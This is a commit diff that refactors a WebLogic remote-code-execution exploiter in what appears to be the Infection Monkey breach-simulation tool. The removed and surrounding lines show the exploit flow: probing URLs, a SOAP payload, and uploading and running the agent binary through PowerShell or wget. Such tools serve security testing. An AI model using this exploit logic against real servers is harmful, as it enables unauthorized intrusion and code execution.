forked from p34709852/monkey
Refactored according to final web_rce framework changes
This commit is contained in:
Vakaris
parent
10528c313d
commit
8fd42abd5d
|
|
@ -50,38 +50,12 @@ class WebLogicExploiter(WebRCE):
|
||||||
'win32': 'monkey-32.exe',
|
'win32': 'monkey-32.exe',
|
||||||
'win64': 'monkey-64.exe'})
|
'win64': 'monkey-64.exe'})
|
||||||
|
|
||||||
def exploit_host(self):
|
def get_exploit_config(self):
|
||||||
# Get open ports
|
exploit_config = super(WebLogicExploiter, self).get_exploit_config()
|
||||||
ports = self.get_ports_w(self.HTTP, ["http"])
|
exploit_config['blind_exploit'] = True
|
||||||
if not ports:
|
exploit_config['stop_checking_urls'] = True
|
||||||
return False
|
exploit_config['url_extensions'] = URLS
|
||||||
# Get urls to try to exploit
|
return exploit_config
|
||||||
urls = self.build_potential_urls(ports, URLS)
|
|
||||||
|
|
||||||
# Checking takes a lot of time, so we check until we get exploitable url and stop
|
|
||||||
vulnerable_urls = []
|
|
||||||
for url in urls:
|
|
||||||
# Get full URL
|
|
||||||
if self.test_exploit(url):
|
|
||||||
vulnerable_urls.append(url)
|
|
||||||
break
|
|
||||||
self._exploit_info['vulnerable_urls'] = vulnerable_urls
|
|
||||||
if not vulnerable_urls:
|
|
||||||
return False
|
|
||||||
|
|
||||||
data = self.upload_monkey(vulnerable_urls[0], {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
|
|
||||||
|
|
||||||
# We can't use 'if not' because response may be ''
|
|
||||||
if not data or data['response'] is False:
|
|
||||||
return False
|
|
||||||
|
|
||||||
if self.change_permissions(vulnerable_urls[0], data['path']) is False:
|
|
||||||
return False
|
|
||||||
|
|
||||||
if self.execute_remote_monkey(vulnerable_urls[0], data['path']) is False:
|
|
||||||
return False
|
|
||||||
|
|
||||||
return True
|
|
||||||
|
|
||||||
def exploit(self, url, command):
|
def exploit(self, url, command):
|
||||||
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||||
|
|
@ -158,7 +132,7 @@ class WebLogicExploiter(WebRCE):
|
||||||
self._stopped = True
|
self._stopped = True
|
||||||
return
|
return
|
||||||
|
|
||||||
def test_exploit(self, url):
|
def check_if_exploitable(self, url):
|
||||||
local_port = get_free_tcp_port()
|
local_port = get_free_tcp_port()
|
||||||
local_ip = get_interface_to_target(self.host.ip_addr)
|
local_ip = get_interface_to_target(self.host.ip_addr)
|
||||||
httpd = WebLogicExploiter.HTTPServer(local_ip, local_port)
|
httpd = WebLogicExploiter.HTTPServer(local_ip, local_port)
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue